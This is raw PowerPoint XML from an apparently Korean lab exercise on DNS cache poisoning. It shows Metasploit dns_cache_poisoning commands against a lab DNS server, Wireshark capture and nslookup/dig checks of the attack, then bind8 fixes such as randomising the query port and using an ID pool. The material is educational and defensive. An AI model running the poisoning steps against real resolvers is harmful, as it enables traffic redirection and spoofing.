        <p:spPr>
          <a:xfrm>
            <a:off x="6355930" y="4806406"/>
            <a:ext cx="4508627" cy="362712"/>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750799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cyber_environment.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 파일을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>열어서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>모든 내용을 복사한다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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번 작업을 통해 관리자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>CMD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 켜서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번의 내용을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>붙혀넣는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>시간 다소 소요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>6.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설정이 완료되면 이 창을 닫고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Downloads/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>cyber_homework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/Terminal/WindowsTerminal.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 찾는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>관리자 권한으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>WindowsTerminal.exe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상단의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>아래화살표</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>표시 를 눌러</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>우분투를 선택한다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4AAD2511-9613-4BCC-8F3E-90550F86C777}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="524256" y="771503"/>
            <a:ext cx="5240817" cy="1851681"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="그림 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89A5ABF6-39CF-4279-BAAA-6AA337B56D83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="524256" y="3950829"/>
            <a:ext cx="5314359" cy="1210523"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="직사각형 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B377DF6-33F2-48FC-8B86-49AD975E5C22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1610782" y="4387238"/>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DE02D0-5512-4A78-8AED-0872D678CD3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6334046" y="1460341"/>
            <a:ext cx="5314359" cy="1483632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="직선 화살표 연결선 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6C11DB7-E081-482A-A3FA-43A37B91764E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6851599" y="1627632"/>
            <a:ext cx="902513" cy="15483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1682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err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) &gt; SET XIDS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>주입할응답수</a:t>
            </a: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endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 이용한 패킷 캡처 시작 및 공격 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) &gt; run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11) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 통해 공격 수행 과정 및 성공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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의가 공격 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버로 전송됨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모듈에 의해 다수의 가짜 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답들이 주입됨</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공격 성공 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 공격 모듈에서 주입한 가짜 응답을 받아들임</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D2CB0AFE-FCF0-4204-9E35-5859167E8F7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="807357" y="842130"/>
            <a:ext cx="3983101" cy="397637"/>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A737117-F3F9-46DB-843B-A2E38DEE89ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="586921" y="2035582"/>
            <a:ext cx="4808220" cy="1219200"/>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AAA93EE2-D63D-4B70-8379-0A37D5E50E8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="3764904"/>
            <a:ext cx="5400040" cy="2312924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F068D89E-FCCB-40A2-94DE-3F6F7FAFBF9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248365" y="459434"/>
            <a:ext cx="5400040" cy="2312924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1D7EFE-14B4-41F0-A66D-15C3B834F394}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248365" y="3074233"/>
            <a:ext cx="5400040" cy="3081782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256582293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12)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명령어로 공격 성공 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>10.10.1.14</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># dig @10.10.1.14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</a:t>
            </a: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en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRP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및 오염시킨 호스트명 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3075A40A-4F63-4F40-A3AB-721CD56A4D84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289877" y="1217687"/>
            <a:ext cx="3204083" cy="1208659"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC8BCBD3-B8EB-48B1-B0E8-42FEF5CCA089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2118999309"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="598914" y="2615860"/>
          <a:ext cx="5328158" cy="2442655"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2820359432"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23743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latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>참고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3906924"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="213508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칼리에서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지정하면 웹 브라우저를 통해 확인 가능</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517656"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4097" name="_x762563712">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F32DD471-B532-4825-93E5-E7DEF111D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676" y="3126920"/>
            <a:ext cx="5204633" cy="1834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0212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로컬 네트워크의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구형이라</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보고되고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보완하시오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EAF5DE74-F8E6-45FD-90D3-B942ECC721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25763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bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 파일 열기 편집</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>named.conf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bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 변경</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558273"/>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query-source port 33333; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>삭제 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>➡ 상위 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버의 응답을 수신하는 포트를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>33333</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 고정하지 않음</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>         (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>단</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의별로 다른 포트 번호가 부여되는 것은 아니며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, bind8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 시작될 때 임의로 지정됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ use-id-pool true;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    ➡ ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 순차적으로 증가시키는 대신 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>풀에서 임의의 값을 사용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>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3F084CBD-CD74-417C-9767-2BEDE009EB09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="701222" y="948266"/>
            <a:ext cx="2417953" cy="328041"/>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624D5152-B9DF-49A2-83BE-4E3736A461D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
